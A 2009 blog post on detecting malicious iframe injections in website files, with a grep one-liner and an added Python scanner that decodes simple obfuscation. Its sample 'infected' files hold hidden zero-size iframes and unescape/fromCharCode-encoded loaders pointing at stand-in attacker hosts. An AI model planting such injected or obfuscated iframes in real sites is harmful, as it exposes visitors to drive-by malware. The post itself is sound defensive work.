Mindbend.org

Parsing Webfiles for Infections

Let's face it, there is a lot of malware going around these days. Gone are the days when mass-mailed .exe attachments were the main vector (though they still go around). Now websites are being hijacked and used as malicious carriers of the virus.

Finding the infection

The scripts here only detect possible infections; the fix itself needs to be hands-on to ensure you don't break anything. It is also worth mentioning that iframes do have legitimate reasons for existence and are used frequently in the industry. Just because this detects a file with an iframe does not mean it is infected. This script searches the website for all files whose names do not match the list of binary extensions (png, jpg, gif and whatever else you add in place of the placeholder) and looks inside each one for iframes.

find . -type f \
  | egrep -iv '\.(png|jpg|_binary files_|gif)$' \
  | xargs grep -li iframe

The result will be a list of files containing iframes.

index.html
services.html
bloglinks.html
site.js

$ cat index.html | grep iframe
<iframe src=http://infected.domain.tld/badfile.htm width=0 height=0></iframe>

This is a simple example; most real infections are much uglier and encode the code that writes the iframe, so a plain search for the word "iframe" can miss them. Cleaning depends on the strain: most strains require an individual, hands-on cleaning solution that scripts cannot provide.
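The find/grep one-liner above finds only the literal word "iframe". As an added example (not part of the original post), the Python script below does the same walk of the web tree, skipping binary extensions, but also decodes two common encoding layers (percent-encoded strings as used with unescape(), and String.fromCharCode() digit lists) before looking for iframe tags, and flags frames with zero or one-pixel dimensions or hidden styling as the more suspicious ones. The extension list, the sample files and the infected.example host are constructed for the demonstration; findings are leads for manual review, not proof of infection.

```python
"""Heuristic scan of a web tree for injected iframes (added example, not the post's own code)."""
import os
import re
import tempfile
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Extensions treated as binary and never inspected (assumption: tune this per site).
BINARY_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".ico", ".pdf", ".zip", ".swf", ".woff"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Zero/one-pixel dimensions or hidden styling are typical of injected frames.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?[01](?:px)?["']?(?=[\s>/])"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE,
)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)", re.IGNORECASE)


def decode_layers(text: str) -> str:
    """Return the text plus simple decodings of two common obfuscation layers."""
    layers = [text]
    if "%" in text:                       # unescape("%3Ciframe...") style
        layers.append(unquote(text))
    for m in FROMCHARCODE_RE.finditer(text):  # String.fromCharCode(60,105,...) style
        codes = [int(n) for n in re.findall(r"\d+", m.group(1))]
        layers.append("".join(chr(c) for c in codes if c < 0x110000))
    return "\n".join(layers)


def classify(text: str) -> List[Tuple[str, str]]:
    """Return (severity, iframe tag) pairs found after decoding; severity is 'hidden' or 'visible'."""
    findings: List[Tuple[str, str]] = []
    seen = set()
    for tag in IFRAME_RE.findall(decode_layers(text)):
        if tag in seen:
            continue
        seen.add(tag)
        severity = "hidden" if HIDDEN_RE.search(tag) else "visible"
        findings.append((severity, tag))
    return findings


def scan_tree(root: str) -> Dict[str, List[Tuple[str, str]]]:
    """Walk root, skip binary extensions, and map relative path -> findings for files with iframes."""
    results: Dict[str, List[Tuple[str, str]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in BINARY_EXTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            findings = classify(text)
            if findings:
                results[os.path.relpath(path, root)] = findings
    return results


def build_sample_site() -> str:
    """Write a small constructed site into a temp dir and return its path (sample data, not real)."""
    root = tempfile.mkdtemp(prefix="webscan_")
    samples = {
        # plain hidden iframe, like the post's example
        "index.html": '<html><body>Hi<iframe src=http://infected.example/badfile.htm width=0 height=0></iframe></body></html>',
        # legitimate, visible embed
        "services.html": '<iframe src="/maps" width="600" height="400"></iframe>',
        # percent-encoded iframe written via unescape()
        "site.js": 'document.write(unescape("%3Ciframe%20src%3D%22http%3A//infected.example/x.htm%22%20width%3D0%20height%3D0%3E%3C/iframe%3E"));',
        # String.fromCharCode() encoding of <iframe src="h" height=0>
        "menu.js": 'eval(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,34,32,104,101,105,103,104,116,61,48,62));',
        "about.html": "<p>No frames here</p>",
        "logo.png": "PNG<iframe>",  # binary extension: must be skipped
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, found in sorted(scan_tree(site).items()):
        for severity, tag in found:
            print(f"{severity:8} {rel}: {tag}")
```

Run it against a copy of the site root instead of build_sample_site() to get a list of files worth opening by hand; the "hidden" entries are the ones to look at first, while "visible" frames are usually the legitimate embeds the post mentions.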

Written by: Robert Church
Published on: 06-06-2009
